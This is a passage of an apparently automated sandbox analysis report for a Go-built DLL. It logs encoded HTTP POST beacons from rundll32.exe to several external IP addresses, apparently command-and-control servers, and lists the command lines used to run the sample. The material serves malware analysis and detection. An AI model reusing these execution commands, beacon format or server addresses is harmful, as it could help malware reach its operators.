    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
    64          192.168.2.5  49780        77.238.250.123  80                1216  C:\Windows\SysWOW64\rundll32.exe
    Timestamp                             Bytes transferred  Direction  Data
    Jul 15, 2024 12:53:32.527395964 CEST  296                OUT        POST / HTTP/1.1
    Host: 77.238.250.123
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: eUkNSG12
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
    Jul 15, 2024 12:53:33.143039942 CEST  183                IN         HTTP/1.1 429 Too Many Requests
    Content-Type: text/plain; charset=utf-8
    X-Content-Type-Options: nosniff
    Date: Mon, 15 Jul 2024 10:53:33 GMT
    Content-Length: 18
    Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
    Data Ascii: Too many requests


    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
    65          192.168.2.5  49781        195.2.70.38     80                6516  C:\Windows\SysWOW64\rundll32.exe
    Timestamp                             Bytes transferred  Direction  Data
    Jul 15, 2024 12:53:33.639770985 CEST  293                OUT        POST / HTTP/1.1
    Host: 195.2.70.38
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: ZdIGkksg
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
    66          192.168.2.5  49782        91.142.74.28    80                6516  C:\Windows\SysWOW64\rundll32.exe
    Timestamp                             Bytes transferred  Direction  Data
    Jul 15, 2024 12:53:35.398521900 CEST  294                OUT        POST / HTTP/1.1
    Host: 91.142.74.28
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: Gs61QEee
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
    67          192.168.2.5  49783        77.238.224.56   80                6516  C:\Windows\SysWOW64\rundll32.exe
    Timestamp                             Bytes transferred  Direction  Data
    Jul 15, 2024 12:53:37.139714003 CEST  295                OUT        POST / HTTP/1.1
    Host: 77.238.224.56
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: 6kahKGxy
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
    68          192.168.2.5  49784        77.238.229.63   80                6516  C:\Windows\SysWOW64\rundll32.exe
    Timestamp                             Bytes transferred  Direction  Data
    Jul 15, 2024 12:53:38.752332926 CEST  295                OUT        POST / HTTP/1.1
    Host: 77.238.229.63
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: VyCvTDYq
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A


    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
    69          192.168.2.5  49785        77.238.250.123  80                6516  C:\Windows\SysWOW64\rundll32.exe
    Timestamp                             Bytes transferred  Direction  Data
    Jul 15, 2024 12:53:40.381884098 CEST  296                OUT        POST / HTTP/1.1
    Host: 77.238.250.123
    User-Agent: Go-http-client/1.1
    Content-Length: 158
    X-Api-Key: lyFi7mBW
    Accept-Encoding: gzip
    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
    Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
    Jul 15, 2024 12:53:41.195003033 CEST  165                IN         HTTP/1.1 429 Too Many Requests
    Content-Type: text/plain; charset=utf-8
    X-Content-Type-Options: nosniff
    Date: Mon, 15 Jul 2024 10:53:41 GMT
    Content-Length: 1
    Data Raw: 0a
    Data Ascii:



    Target ID:0
    Start time:06:50:49
    Start date:15/07/2024
    Path:C:\Windows\System32\loaddll32.exe
    Wow64 process (32bit):true
    Commandline:loaddll32.exe "C:\Users\user\Desktop\file.dll"
    Imagebase:0xd10000
    File size:126'464 bytes
    MD5 hash:51E6071F9CBA48E79F10C84515AAE618
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:1
    Start time:06:50:49
    Start date:15/07/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff6d64d0000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    Target ID:3
    Start time:06:50:49
    Start date:15/07/2024
    Path:C:\Windows\SysWOW64\cmd.exe
    Wow64 process (32bit):true
    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1
    Imagebase:0x790000
    File size:236'544 bytes
    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    Target ID:4
    Start time:06:50:49
    Start date:15/07/2024
    Path:C:\Windows\SysWOW64\rundll32.exe
    Wow64 process (32bit):true
    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",#1
    Imagebase:0x1b0000
    File size:61'440 bytes
    MD5 hash:889B99C52A60DD49227C5E485A016679
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    Target ID:5
    Start time:06:50:49
    Start date:15/07/2024
    Path:C:\Windows\SysWOW64\rundll32.exe
    Wow64 process (32bit):true
    Commandline:rundll32.exe C:\Users\user\Desktop\file.dll,MainFunc
    Imagebase:0x1b0000
    File size:61'440 bytes
    MD5 hash:889B99C52A60DD49227C5E485A016679
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    Target ID:6
    Start time:06:50:53
    Start date:15/07/2024
    Path:C:\Windows\SysWOW64\rundll32.exe
    Wow64 process (32bit):true
    Commandline:rundll32.exe C:\Users\user\Desktop\file.dll,_cgo_dummy_export
    Imagebase:0x1b0000
    File size:61'440 bytes
    MD5 hash:889B99C52A60DD49227C5E485A016679
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:7
    Start time:06:50:59
    Start date:15/07/2024
    Path:C:\Windows\SysWOW64\rundll32.exe
    Wow64 process (32bit):true
    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",MainFunc
    Imagebase:0x1b0000
    File size:61'440 bytes
    MD5 hash:889B99C52A60DD49227C5E485A016679
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    Target ID:8
    Start time:06:50:59
    Start date:15/07/2024
    Path:C:\Windows\SysWOW64\rundll32.exe
    Wow64 process (32bit):true
    Commandline:rundll32.exe "C:\Users\user\Desktop\file.dll",_cgo_dummy_export
    Imagebase:0x1b0000
    File size:61'440 bytes
    MD5 hash:889B99C52A60DD49227C5E485A016679
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    No disassembly